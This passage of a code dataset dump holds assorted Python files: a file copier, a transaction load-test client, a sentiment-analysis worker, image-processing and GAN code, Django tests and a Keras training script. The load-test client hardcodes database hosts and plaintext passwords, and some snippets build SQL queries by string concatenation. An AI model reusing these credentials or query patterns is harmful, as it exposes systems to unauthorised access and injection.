.jpg) and copy them to a new location.\n\nimport os, shutil\n\ndef copy(src_folder, ext, dest_folder):\n '''Copy the files with a certain file extension from a source folder\n to a destination folder.'''\n\n # make sure folder has absolute path\n src_folder = os.path.abspath(src_folder)\n \n # make sure destination folder exists (os.path has no mkdir; use os.makedirs)\n if not os.path.isdir(dest_folder):\n os.makedirs(dest_folder)\n \n dest_folder = os.path.abspath(dest_folder)\n\n print('Copying files with extension %s' % ext)\n\n for foldername, subfolders, filenames in os.walk(src_folder):\n for filename in filenames:\n if filename.endswith(ext):\n filepath = os.path.join(src_folder, filename)\n shutil.copy(filepath, dest_folder)\n","sub_path":"ch09/copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"109083703","text":"import random\nimport uuid\nimport json\nfrom threading import Thread\nimport http.client, sys\nfrom queue import Queue\nimport time\nimport pg\n\n# Test client that posts txns to the processor at dev.spentlabs.com:8600/crap/txns (only serial sending is supported: in parallel mode the same, non-random UUID is generated, cause unknown)\n\n# DBconn = pg.DB(host=\"spent-b2b-staging.cwmk7rmhhzlq.eu-west-1.rds.amazonaws.com\", user=\"postgres\", passwd=\"9Ez1Bu8ILD%nC*8khEHH4jTg\", dbname=\"postgres\")\nDBconn = pg.DB(host=\"postgres.dev.spentlabs.com\", user=\"postgres\", passwd=\"hasp513#burt\", dbname=\"postgres\")\nuserid1 = str(random.randint(1000, 100000000))\nsessionDiscription = str(random.randint(1000, 100000000))\nurlAuth = \"http://dev.spentlabs.com/api/v1/auth/token\"\nurlOffers = \"http://dev.spentlabs.com/api/v1/offers\"\nurlReadHash = \"SELECT * FROM customer_users where user_id='\" + userid1 + 
\"'\"\nurlreadresult = \"SELECT * FROM cashback_transaction where user_id='\" + userid1 + \"'\"\nprint('user_id = ',userid1)\n\n\nconcurrent = 10\nTxnCount = 10\nlst = []\nk = 0\nk1 = 0\nk2 = 0\nuschk = 0\nuserid = 0\nlist = ['pending','available','rejected']\ntotalsum = 0\nfsum = 0\ndef doWork():\n global k, k1, k2, w, totalsum\n w = 0\n # while w < TxnCount:\n # w += 1\n while True:\n time.sleep(0.1)\n lst,conn,fsum = q.get()\n print(lst)\n # print(payload)\n # print(json.dumps(lst))\n conn.request(\"POST\", \"/crap/txns\", json.dumps(lst))\n res = conn.getresponse()\n k2 += 1\n conn.close()\n # print(fsum)\n # print(lst)\n if res.status == 200:\n totalsum = totalsum + fsum\n k = k + 1\n print(k)\n else:\n k1 += 1\n # q.task_done()\n\n\n\nq = Queue(concurrent * concurrent)\nstart_time = time.time()\nfor i in range(concurrent):\n t = Thread(target=doWork)\n t.daemon = True\n t.start()\ntry:\n for body in range(0, concurrent):\n conn = http.client.HTTPConnection('dev.spentlabs.com', 8600)\n cnt = 0\n # lst.clear()\n # while cnt BASE_NEGATIVE_SCORE)\n\n def _map_score(self, score):\n return POSITIVE_SCORE if score >= BASE_POSITIVE_SCORE else NEGATIVE_SCORE\n\n def _callback(self, ch, method, properties, body):\n decoded_body = body.decode('UTF-8')\n\n if (self.log_counter % LOG_FREQUENCY == 0):\n logging.info(\"Received line [%d] %s\", self.log_counter, decoded_body)\n\n body_values = decoded_body.split(\",\")\n\n score = self.sentiment_analyzer.polarity_scores(body_values[TEXT])['compound']\n\n if (self.log_counter % LOG_FREQUENCY == 0):\n logging.info(\"Score is %s\", score)\n\n if self._is_score_neutral(score):\n if (self.log_counter % LOG_FREQUENCY == 0):\n logging.info(\"The score is neutral\")\n self.log_counter += 1\n return\n\n score = self._map_score(score)\n\n if (self.log_counter % LOG_FREQUENCY == 0):\n logging.info(\"Sending: author_id = %s, date = %s, score = %s\", body_values[AUTHOR_ID], body_values[CREATED_AT], score)\n \n self.send_usr_queues.send(\"{},{}\".format(body_values[AUTHOR_ID], score), body_values[AUTHOR_ID])\n self.send_date_queues.send(\"{},{}\".format(body_values[CREATED_AT], score), body_values[AUTHOR_ID])\n\n self.log_counter += 1\n\n def run(self):\n logging.info(\"Start consuming\")\n self.receive_queue.consume(self._callback)\n logging.info(\"Sending EOM to usr queues\")\n self.send_usr_queues.send_eom()\n logging.info(\"Sending EOM to date queus\")\n self.send_date_queues.send_eom()\n logging.info(\"Finish\")\n\nif __name__ == '__main__':\n config_log(\"ANALYZER\")\n\n rabbitmq_host = os.environ['RABBITMQ_HOST']\n analyzer_workers = int(os.environ['ANALYZER_WORKERS'])\n filter_parser_workers = int(os.environ['FILTER_PARSER_WORKERS'])\n user_reduce_workers = int(os.environ['USER_REDUCER_WORKERS'])\n date_reduce_workers = int(os.environ['DATE_REDUCER_WORKERS'])\n\n worker_id = int(os.environ['SERVICE_ID'])\n\n send_usr_queues = RabbitMQQueues(SEND_USR_QUEUE_NAME, rabbitmq_host, user_reduce_workers)\n send_date_queues = RabbitMQQueues(SEND_DATE_QUEUE_NAME, rabbitmq_host, date_reduce_workers)\n receive_queue = RabbitMQQueue(\"{}{}\".format(RECEIVE_QUEUE_NAME, worker_id), rabbitmq_host, filter_parser_workers)\n worker = TwitterTextSentimentAnalyzer(receive_queue, send_usr_queues, send_date_queues)\n\n logging.info(\"Worker created, started running\")\n\n worker.run()\n\n logging.info(\"Worker finished, 
exiting\")\n","sub_path":"src/analyzer/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"74588329","text":"#!/usr/bin/env python3\n'''doc string'''\n\nimport os\nimport re\nfrom functools import reduce\nfrom shutil import rmtree\n\nimport cv2\n\n\ndef main():\n '''main method'''\n if DO_TEST:\n test(filter_size=25, canny_thresh1=25,\n canny_thresh2=65, use_grayscale=True)\n else:\n run()\n\n\nDO_TEST = False\n\n_REGEX_PAT = r'^(\\.\\/)?\\d+(_real)?$'\n_EXCLUDED_LIST = [\n \"4121715\",\n \"4142865\",\n \"4206482\",\n \"4514553\",\n # \"4538007\",\n \"6093977\",\n]\n\n# GEN_IMAGE = 1\n# REAL_PHOTO = 2\n\n\nclass Preset:\n '''Preset class'''\n\n def __init__(self, filter_size=17, canny_thresh1=30, canny_thresh2=50, use_grayscale=True):\n self.filter_size = filter_size\n self.canny_thresh1 = canny_thresh1\n self.canny_thresh2 = canny_thresh2\n self.use_grayscale = use_grayscale\n\n\nPreset.GEN_IMAGE = Preset(\n filter_size=17, canny_thresh1=30,\n canny_thresh2=50, use_grayscale=False)\nPreset.REAL_PHOTO = Preset(\n filter_size=23, canny_thresh1=30,\n canny_thresh2=50, use_grayscale=True)\nPreset.RP_EID_4538007 = Preset(\n filter_size=25, canny_thresh1=25,\n canny_thresh2=65, use_grayscale=True)\n\n\ndef get_img(f_name):\n '''return image from file name'''\n return cv2.imread(f_name)\n\n\ndef get_bound_rect(img, ftr_size, thresh1, thresh2, use_grayscale):\n '''return x, y, w, h (COOR & DIM) of bounding rectangle from image\n x=0, y=0 is upper left corner'''\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) if use_grayscale else img\n img3 = cv2.GaussianBlur(img, (ftr_size, ftr_size), sigmaX=0)\n imgc = cv2.Canny(img3, thresh1, thresh2)\n x, y, w, h = cv2.boundingRect(imgc)\n return x, y, w, h\n\n\ndef draw_rect(img, x, y, w, h, color, thickness):\n '''draw a rectangle with x, y, w, h (COOR & DIM) on image'''\n return cv2.rectangle(img, (x, y), (x+w, y+h),\n color=color, thickness=thickness)\n\n\ndef get_bounded_img(f_name, filter_size=17, canny_thresh1=30, canny_thresh2=50,\n use_grayscale=True, rect_color=(0, 255, 0), rect_thickness=3,\n use_preset=None):\n '''get image with bounded rectangle from file name'''\n if use_preset is not None:\n filter_size = use_preset.filter_size\n canny_thresh1 = use_preset.canny_thresh1\n canny_thresh2 = use_preset.canny_thresh2\n use_grayscale = use_preset.use_grayscale\n\n img = get_img(f_name)\n x, y, w, h = get_bound_rect(\n img, filter_size, canny_thresh1, canny_thresh2, use_grayscale)\n print((x, y, w, h))\n return draw_rect(img, x, y, w, h, rect_color, rect_thickness)\n\n\ndef test(filter_size=17, canny_thresh1=30, canny_thresh2=50, use_grayscale=False):\n '''for testing'''\n for root, _, files in os.walk(\"test\"):\n out_folder = f\"{root}_rect\"\n if os.path.exists(out_folder):\n rmtree(out_folder)\n os.mkdir(out_folder)\n print(out_folder, \"created\")\n\n for file in files:\n assert isinstance(file, str)\n if not re.search(r'\\.(png|PNG|jpe?g|JPE?G)$', file):\n continue\n\n print(f\"{file} \", end='')\n img = get_img(f\"{root}/{file}\")\n # convert a working copy to grayscale so the blur/Canny below actually use it\n # (the original assigned an unused img2 and kept processing the color image)\n img_proc = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) if use_grayscale else img\n imgb = cv2.GaussianBlur(img_proc, (filter_size, filter_size), sigmaX=0)\n imgc = cv2.Canny(imgb, canny_thresh1, canny_thresh2)\n x, y, w, h = cv2.boundingRect(imgc)\n imgo = draw_rect(img, x, y, w, h, (0, 255, 0), 3)\n cv2.imshow('imgb', imgb)\n cv2.imshow('imgc', imgc)\n cv2.imshow('imgo', imgo)\n cv2.waitKey(0)\n 
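# close the preview windows, then save the annotated image to the output folder\n 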
cv2.destroyAllWindows()\n cv2.imwrite(\n f\"{out_folder}/{file}\",\n get_bounded_img(f\"{root}/{file}\")\n )\n\n\ndef run():\n '''run main program'''\n for root, _, files in os.walk(\".\"):\n if not re.search(_REGEX_PAT, root):\n continue\n\n if reduce(\n lambda acc, val: acc | (re.search(val, root) is not None),\n _EXCLUDED_LIST,\n False):\n print(root, \"skipped\")\n continue\n\n # check if folder is GEN_IMAGE or REAL_PHOTO\n is_real_photo = True if re.search(r'_real$', root) else False\n\n if not is_real_photo:\n continue\n\n # create output folder\n out_folder = f\"{root}_rect\"\n if os.path.exists(out_folder):\n rmtree(out_folder)\n os.mkdir(out_folder)\n print(out_folder, \"created\")\n\n # loop all images\n for file in files:\n assert isinstance(file, str)\n if not re.search(r'\\.(png|PNG|jpe?g|JPE?G)$', file):\n continue\n\n print(f\"{file} \", end='')\n\n # select preset\n sel_preset = Preset.REAL_PHOTO if is_real_photo else Preset.GEN_IMAGE\n eid = re.search(\n r'\\d+(?=(_real))?(?!(\\d|_rect|_real_rect))', root).group(0)\n sel_preset = Preset.RP_EID_4538007 if eid == '4538007' and is_real_photo else sel_preset\n img = get_bounded_img(\n f\"{root}/{file}\",\n use_preset=sel_preset\n )\n\n # write image file to output folder\n cv2.imwrite(f\"{out_folder}/{file}\", img)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"img_test.py","file_name":"img_test.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"279895077","text":"import tensorflow as tf\r\nfrom functools import partial\r\n\r\nclass SN(tf.keras.layers.Wrapper):\r\n\tdef __init__(self, layer, **kwargs):\r\n\t\tsuper(SN, self).__init__(layer, **kwargs)\r\n\t\tself.layer = layer\r\n\r\n\tdef build(self, input_shape):\r\n\t\tif not self.layer.built:\r\n\t\t\tself.layer.build(input_shape)\r\n\r\n\t\t\tself.w = self.layer.kernel\r\n\t\t\tself.w_shape = self.w.get_shape().as_list()\r\n\t\t\tself.u = self.add_weight(\"u\",\r\n\t\t\t\t\t\t\t\t\tshape = [self.w_shape[-1], 1],\r\n\t\t\t\t\t\t\t\t\tinitializer = tf.random.normal,\r\n\t\t\t\t\t\t\t\t\ttrainable = False)\r\n\t\tsuper(SN, self).build()\r\n\r\n\tdef call(self, x, train = True):\r\n\r\n\t\tdef _power_iteration(w, train):\r\n\t\t\t_v = tf.matmul(w, self.u)\r\n\t\t\tv = tf.math.l2_normalize(_v, axis = 0)\r\n\t\t\t_u = tf.matmul(tf.transpose(w), v)\r\n\t\t\tu = tf.math.l2_normalize(_u, axis = 0)\r\n\t\t\tif train:\r\n\t\t\t\tself.u.assign(u)\r\n\r\n\t\t\tv = tf.stop_gradient(v)\r\n\t\t\tu = tf.stop_gradient(u)\r\n\t\t\tw = w / (tf.matmul(tf.matmul(tf.transpose(v), w), u))\r\n\t\t\treturn w\r\n\r\n\t\tw = tf.reshape(self.w, [-1, self.w_shape[-1]])\r\n\t\tself.layer.kernel = tf.reshape(_power_iteration(w, train = train), self.w_shape)\r\n\t\treturn self.layer(x)\r\n\r\nclass ConditionalShift(tf.keras.layers.Layer):\r\n\tdef __init__(self, channel, **kwargs):\r\n\t\tsuper(ConditionalShift, self).__init__(**kwargs)\r\n\t\tself.linear_gamma = tf.keras.layers.Dense(channel, \r\n\t\t\tkernel_initializer = tf.ones, # partial(tf.random.normal, mean = 1.0, stddev = 0.01),\r\n\t\t\tuse_bias = False,\r\n\t\t\tname = 'linear_gamma')\r\n\t\tself.linear_beta = tf.keras.layers.Dense(channel, \r\n\t\t\tkernel_initializer = tf.zeros, # partial(tf.random.normal, mean = 0.0, stddev = 0.01),\r\n\t\t\tuse_bias = False,\r\n\t\t\tname = 'linear_beta')\r\n\tdef call(self, x, c):\r\n\t\tn_dim = len(x.get_shape().as_list())\r\n\t\tgamma = self.linear_gamma(c)\r\n\t\tbeta = 
self.linear_beta(c)\r\n\t\tfor i in range(n_dim - 2):\r\n\t\t\tgamma = tf.expand_dims(gamma, axis = 1)\r\n\t\t\tbeta = tf.expand_dims(beta, axis = 1)\r\n\t\treturn x * gamma + beta\r\n\r\nclass ConditionalBatchNorm(tf.keras.layers.Layer):\r\n\tdef __init__(self, channel, **kwargs):\r\n\t\tsuper(ConditionalBatchNorm, self).__init__(**kwargs)\r\n\t\tself.linear_gamma = tf.keras.layers.Dense(channel, \r\n\t\t\tkernel_initializer = tf.ones,\r\n\t\t\tuse_bias = False,\r\n\t\t\tname = 'linear_gamma')\r\n\t\tself.linear_beta = tf.keras.layers.Dense(channel, \r\n\t\t\tkernel_initializer = tf.zeros,\r\n\t\t\tuse_bias = False,\r\n\t\t\tname = 'linear_beta')\r\n\t\tself.batchnorm = tf.keras.layers.BatchNormalization()\r\n\r\n\tdef call(self, x, c, train = True):\r\n\t\tn_dim = len(x.get_shape().as_list())\r\n\t\tx = self.batchnorm(x)\r\n\t\tgamma = self.linear_gamma(c)\r\n\t\tbeta = self.linear_beta(c)\r\n\t\tfor i in range(n_dim - 2):\r\n\t\t\tgamma = tf.expand_dims(gamma, axis = 1)\r\n\t\t\tbeta = tf.expand_dims(beta, axis = 1)\r\n\t\treturn x * gamma + beta\r\n\r\nclass GResBlock(tf.keras.layers.Layer):\r\n\tdef __init__(self, channel, upsample = True, **kwargs):\r\n\t\tsuper(GResBlock, self).__init__(**kwargs)\r\n\t\tself.deconv1 = SN(tf.keras.layers.Conv2DTranspose(channel, 5, 2 if upsample else 1, 'same', name = 'deconv1', activation = tf.nn.leaky_relu))\r\n\t\tself.cBN1 = ConditionalShift(channel)\r\n\t\tself.deconv2 = SN(tf.keras.layers.Conv2DTranspose(channel, 5, 1, 'same', name = 'deconv2', activation = tf.nn.leaky_relu))\r\n\t\tself.cBN2 = ConditionalShift(channel)\r\n\t\tself.upsample = tf.keras.layers.UpSampling2D(2 if upsample else 1)\r\n\t\tself.deconv3 = SN(tf.keras.layers.Conv2DTranspose(channel, 1, 1, 'same', name = 'deconv3', activation = tf.nn.leaky_relu))\r\n\tdef call(self, x, c, train = True):\r\n\t\ty = self.deconv1(x, train = train)\r\n\t\ty = self.cBN1(y, c)\r\n\t\ty = self.deconv2(y, train = train)\r\n\t\ty = self.cBN2(y, c)\r\n\t\tx = self.deconv3(self.upsample(x), train = train)\r\n\t\treturn x + y\r\n\r\nclass Generator(tf.keras.Model):\r\n\tdef __init__(self, **kwargs):\r\n\t\tsuper(Generator, self).__init__(**kwargs)\r\n\t\tself.layer_stack = []\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Dense(7 * 7 * 256, activation = tf.nn.leaky_relu, name = 'fc1')))\r\n\t\tself.layer_stack.append(tf.keras.layers.Reshape([7, 7, 256]))\r\n\t\tself.layer_stack.append(GResBlock(128))\r\n\t\tself.layer_stack.append(GResBlock(128))\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Conv2DTranspose(1, 5, 1, 'same', activation = tf.nn.tanh, name = 'out1')))\r\n\r\n\tdef call(self, x, c, train = True):\r\n\t\tfor layer in self.layer_stack:\r\n\t\t\tif isinstance(layer, SN):\r\n\t\t\t\tx = layer(x, train = train)\r\n\t\t\telif isinstance(layer, GResBlock):\r\n\t\t\t\tx = layer(x, c, train = train)\r\n\t\t\telse:\r\n\t\t\t\tx = layer(x)\r\n\t\treturn x\r\n\r\nclass Discriminator(tf.keras.Model):\r\n\tdef __init__(self, **kwargs):\r\n\t\tsuper(Discriminator, self).__init__(**kwargs)\r\n\t\tself.layer_stack = []\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Conv2D(128, 5, 1, 'same', activation = tf.nn.leaky_relu, name = 'conv1')))\r\n\t\t# self.layer_stack.append(ConditionalShift(64, name = 'cs1'))\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Conv2D(128, 5, 2, 'same', activation = tf.nn.leaky_relu, name = 'conv2')))\r\n\t\t# self.layer_stack.append(ConditionalShift(64, name = 'cs2'))\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Conv2D(128, 5, 2, 'same', activation = 
tf.nn.leaky_relu, name = 'conv3')))\r\n\t\t\r\n\t\t# self.layer_stack.append(global_sum_pooling)\r\n\t\tself.layer_stack.append(tf.keras.layers.Flatten())\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Dense(32, activation = tf.nn.leaky_relu, name = 'fc1')))\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Dense(1, name = 'fc2')))\r\n\r\n\tdef call(self, x, c, train = True):\r\n\t\tc = tf.tile(tf.reshape(c, [-1, 1, 1, 10]), [1, 28, 28, 1])\r\n\t\tx = tf.concat([x, c], axis = 3)\r\n\t\tfor layer in self.layer_stack:\r\n\t\t\tif isinstance(layer, SN):\r\n\t\t\t\tx = layer(x, train = train)\r\n\t\t\telse:\r\n\t\t\t\tx = layer(x)\r\n\t\treturn x\r\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"461092222","text":"#!/usr/bin/env python\n# vim: ai ts=4 sts=4 et sw=4\n\n\nfrom rapidsms.conf import settings\nfrom rapidsms.apps.base import AppBase\nfrom rapidsms_xforms.models import xform_received, XFormSubmission, XFormSubmissionValue\nfrom rapidsms.models import Contact, Connection\nfrom people.models import Person, PersonType\nfrom dateutil import parser\n\n\nclass App(AppBase):\n\n    # define a listener\n    def handle_submission(sender, **args):\n        submission = args['submission']\n        xform = args['xform']\n        \n        if xform.keyword == 'new' and not submission.has_errors:\n            chw = submission.connection.contact\n            if not chw:\n                return None;\n            patient_type = PersonType.objects.filter(singular=\"Patient\")[0]\n            patient = Person.objects.create(type_id=patient_type.pk)\n            patient.reporter.add(chw)\n            for value in submission.values.all():\n                attr = value.attribute.name\n                val = value.value\n                #print(attr)\n                #print(val)\n                if attr == 'name':\n                    patient.name = val\n                elif attr == 'mothers_name':\n                    patient.mothers_name = val \n                elif attr == 'gender':\n                    patient.gender = val\n                elif attr == 'patient_id':\n                    patient.code = val\n                elif attr == 'date_of_birth':\n                    # dateutil is imported as the module 'parser'; the original called undefined Parser.parse\n                    patient.date_of_birth = parser.parse(val, dayfirst=True)\n            \n            patient.submissions.add(submission)    \n            patient.save()\n            return None\n        \n        if xform.keyword in ('basic','child') and not submission.has_errors:\n            for value in submission.values.all():\n                attr = value.attribute.name\n                val = value.value\n                if attr == 'patient_id':\n                    id = val\n            \n            patient = Person.objects.filter(code=id)\n            if not patient:\n                # NOTE: no 'msg' object exists in this signal handler, so the original msg.error() call would raise NameError\n                print('Sorry, no patient was found with that ID')\n                return None\n            patient[0].submissions.add(submission)\n            patient[0].save()\n            return None\n\n\n\n    # then wire it to the xform_received signal\n    xform_received.connect(handle_submission)","sub_path":"chw/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"576375483","text":"import pytest\nfrom django.urls import reverse\nfrom rozbieznosci_dyscyplin.models import RozbieznosciView\n\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom bpp.models import Autor_Dyscyplina\n\nfrom django_bpp.selenium_util import wait_for\n\n\n@pytest.fixture\ndef zle_przypisana_praca(\n    autor_jan_kowalski,\n    jednostka,\n    dyscyplina1,\n    dyscyplina2,\n    dyscyplina3,\n    wydawnictwo_ciagle,\n    rok,\n):\n    Autor_Dyscyplina.objects.create(\n        autor=autor_jan_kowalski,\n        rok=rok,\n        dyscyplina_naukowa=dyscyplina1,\n        subdyscyplina_naukowa=dyscyplina2,\n    )\n\n    wca = wydawnictwo_ciagle.dodaj_autora(autor_jan_kowalski, jednostka)\n\n    from django.db import connection\n\n    cursor = 
connection.cursor()\n cursor.execute(\n \"UPDATE bpp_wydawnictwo_ciagle_autor SET dyscyplina_naukowa_id = %s WHERE id = %s\"\n % (dyscyplina3.pk, wca.pk)\n )\n\n # wca.dyscyplina_naukowa_id = dyscyplina3\n # dyscyplina_naukowa=dyscyplina3)\n\n return wydawnictwo_ciagle\n\n\n@pytest.mark.django_db\ndef test_znajdz_rozbieznosci_gdy_przypisanie_autor_dyscyplina(\n autor_jan_kowalski,\n jednostka,\n dyscyplina1,\n dyscyplina2,\n dyscyplina3,\n wydawnictwo_ciagle,\n rok,\n):\n Autor_Dyscyplina.objects.create(\n autor=autor_jan_kowalski,\n rok=rok,\n dyscyplina_naukowa=dyscyplina1,\n subdyscyplina_naukowa=dyscyplina2,\n )\n\n wca = wydawnictwo_ciagle.dodaj_autora(\n autor_jan_kowalski, jednostka, dyscyplina_naukowa=dyscyplina1\n )\n\n assert RozbieznosciView.objects.count() == 0\n\n wca.dyscyplina_naukowa = dyscyplina2\n wca.save()\n\n assert RozbieznosciView.objects.count() == 0\n\n from django.db import connection\n\n cur = connection.cursor()\n cur.execute(\n \"UPDATE bpp_wydawnictwo_ciagle_autor SET dyscyplina_naukowa_id = %s WHERE id = %s\"\n % (dyscyplina3.pk, wca.pk)\n )\n\n assert RozbieznosciView.objects.first().autor == autor_jan_kowalski\n\n wca.dyscyplina_naukowa = None\n wca.save()\n\n assert RozbieznosciView.objects.first().autor == autor_jan_kowalski\n\n\n@pytest.mark.django_db\ndef test_znajdz_rozbieznosci_bez_przypisania_autor_dyscyplina(\n autor_jan_kowalski,\n jednostka,\n dyscyplina1,\n dyscyplina2,\n dyscyplina3,\n wydawnictwo_ciagle,\n rok,\n):\n wca = wydawnictwo_ciagle.dodaj_autora(autor_jan_kowalski, jednostka)\n\n from django.db import connection\n\n cursor = connection.cursor()\n cursor.execute(\n \"UPDATE bpp_wydawnictwo_ciagle_autor SET dyscyplina_naukowa_id = %s WHERE id = %s\"\n % (dyscyplina1.pk, wca.pk)\n )\n\n assert RozbieznosciView.objects.count() == 1\n\n wca.dyscyplina_naukowa = None\n wca.save()\n\n assert RozbieznosciView.objects.count() == 0\n\n\n@pytest.mark.django_db\ndef test_api_rozbieznoscidyscyplin_view_niezalogowany(client, zle_przypisana_praca):\n res = client.get(reverse(\"rozbieznosci_dyscyplin:api-rozbieznosci-dyscyplin\"))\n assert res.status_code == 302\n\n\n@pytest.mark.django_db\ndef test_api_rozbieznoscidyscyplin_view(client, admin_user, zle_przypisana_praca):\n client.login(username=admin_user, password=\"password\")\n res = client.get(reverse(\"rozbieznosci_dyscyplin:api-rozbieznosci-dyscyplin\"))\n assert res.status_code == 200\n assert res.json()[\"data\"][0][\"tytul_oryginalny\"].find(\"target\") > 0\n\n res = client.get(\n reverse(\"rozbieznosci_dyscyplin:api-rozbieznosci-dyscyplin\"),\n {\"search[value]\": \"foo\"},\n )\n assert res.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_redirect_to_admin_view(wydawnictwo_ciagle, client, admin_user):\n res = client.get(\n reverse(\n \"rozbieznosci_dyscyplin:redirect-to-admin\",\n kwargs={\n \"content_type_id\": ContentType.objects.get_for_model(\n wydawnictwo_ciagle\n ).pk,\n \"object_id\": wydawnictwo_ciagle.pk,\n },\n )\n )\n assert res.status_code == 302\n\n client.login(username=admin_user, password=\"password\")\n res2 = client.get(res.url)\n\n assert res2.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_main_view(zle_przypisana_praca, client, admin_user):\n res = client.get(reverse(\"rozbieznosci_dyscyplin:main-view\"))\n assert res.status_code == 302\n\n client.login(username=admin_user, password=\"password\")\n\n res = client.get(reverse(\"rozbieznosci_dyscyplin:main-view\"))\n assert res.status_code == 200\n\n\n@pytest.mark.django_db\ndef 
test_main_view_admin(zle_przypisana_praca, admin_browser, asgi_live_server):\n admin_browser.visit(\n asgi_live_server.url + reverse(\"rozbieznosci_dyscyplin:main-view\")\n )\n wait_for(lambda: \"Kowalski\" in admin_browser.html)\n","sub_path":"src/rozbieznosci_dyscyplin/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"305468544","text":"import csv\r\nimport re\r\n\r\ndef extract_skills(resume_string):\r\n resume_string = resume_string.replace(',',' ')\r\n\r\n #Converting all the charachters in lower case\r\n \r\n resume_string= resume_string.lower()\r\n # resume_string = re.finditer(r'[a-zA-Z0-9 \\.\\/\\++\\@\\(\\)\\]', resume_string)\r\n\r\n with open(r\"C:\\Users\\HimanshuKholiya\\Desktop\\newUI\\programmingskills.csv\", 'rt') as f:\r\n reader = csv.reader(f)\r\n your_list1 = list(reader)\r\n your_list1 = set(your_list1[0])\r\n your_list1 = [word.lower() for word in your_list1]\r\n\r\n with open(r\"C:\\Users\\HimanshuKholiya\\Desktop\\newUI\\toolandsoftware.csv\", 'rt') as f:\r\n reader = csv.reader(f)\r\n your_list2 = list(reader)\r\n your_list2 = set(your_list2[0])\r\n your_list2 = [word.lower() for word in your_list2] \r\n\r\n your_list = your_list1+your_list2\r\n\r\n your_list = ' | '.join(your_list)\r\n your_list = your_list.replace(r\"+\",r\"\\+\").replace(r\".\",r\"\\.\").replace(r')',r\"\").replace(r'(',r\"\")\r\n mylist = []\r\n try:\r\n matched_list = re.finditer(your_list, resume_string)\r\n for match in matched_list:\r\n mylist.append(match.group())\r\n return list(set(mylist))\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\n","sub_path":"skills.py","file_name":"skills.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"17798062","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nimport boto3\nimport pickle\nimport gc\nimport os\nimport sys\nimport traceback\n\nimport utils.config as config\n\nfrom keras import backend as K\nfrom keras import initializers\nfrom keras.engine.topology import Layer\nfrom keras.utils.np_utils import to_categorical\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import load_model\nfrom keras.utils import CustomObjectScope\n\ndata_dir = '/opt/ml/input/data/train/'\nmodel_dir = '/opt/ml/model/'\ncheckpoints_dir = '/opt/ml/checkpoints/'\noutput_dir = '/opt/ml/output/'\n\nX_train_file, X_val_file, y_train_file, y_val_file = \\\n data_dir + 'X_train.pkl', data_dir + 'X_val.pkl', data_dir + 'y_train.pkl', data_dir + 'y_val.pkl'\nwith open(X_train_file, 'rb') as infile:\n X_train = pickle.load(infile)\nwith open(X_val_file, 'rb') as infile:\n X_val = pickle.load(infile)\nwith open(y_train_file, 'rb') as infile:\n y_train = pickle.load(infile)\nwith open(y_val_file, 'rb') as infile:\n y_val = pickle.load(infile)\n\nmax_words = config.max_words # max num words processed for each sentence\nmax_sentences = config.max_sentences # max num sentences processed for each article \nmax_vocab = config.max_vocab\nattention_dim = config.attention_dim\nepoch = config.epoch\nbatch_size = config.batch_size\nwords_file = data_dir + 'words.pkl'\nsaved_model_name = 'model.{}.hdf5'.format(epoch - 1)\nsaved_model = data_dir + saved_model_name\n\ny_train = np.asarray(to_categorical(y_train))\ny_val = np.asarray(to_categorical(y_val))\n\nwith open(words_file, 'rb') as infile:\n words = 
pickle.load(infile)\nword_index = {}\nfor ix, (word, _) in enumerate(words.most_common(max_vocab)):\n word_index[word] = ix + 1\n\ndef create_data_matrix(data, max_sentences=max_sentences, max_words=max_words, max_vocab=max_vocab,\n word_index=word_index):\n data_matrix = np.zeros((len(data), max_sentences, max_words), dtype='int32')\n for i, article in enumerate(data):\n for j, sentence in enumerate(article):\n if j == max_sentences:\n break\n k = 0\n for word in sentence:\n if k == max_words:\n break\n ix = word_index.get(word.lower())\n if ix is not None and ix < max_vocab:\n data_matrix[i, j, k] = ix\n k = k + 1\n return data_matrix\n\nX_train = create_data_matrix(X_train)\nX_val = create_data_matrix(X_val)\n\nclass HierarchicalAttentionNetwork(Layer):\n '''Attention pooling layer used at both word and sentence level of a HAN.'''\n def __init__(self, **kwargs):\n self.init_weights = initializers.get('glorot_normal')\n self.init_bias = initializers.get('zeros')\n self.supports_masking = True\n self.attention_dim = attention_dim\n super().__init__(**kwargs) # forward standard Layer kwargs (e.g. name) instead of dropping them\n\n def build(self, input_shape):\n assert len(input_shape) == 3\n self.W = K.variable(self.init_weights((input_shape[-1], self.attention_dim)))\n self.b = K.variable(self.init_bias((self.attention_dim,)))\n self.u = K.variable(self.init_weights((self.attention_dim, 1)))\n self.trainable_weights = [self.W, self.b, self.u]\n super().build(input_shape)\n\n def compute_mask(self, inputs, mask=None):\n return None\n\n def call(self, x, 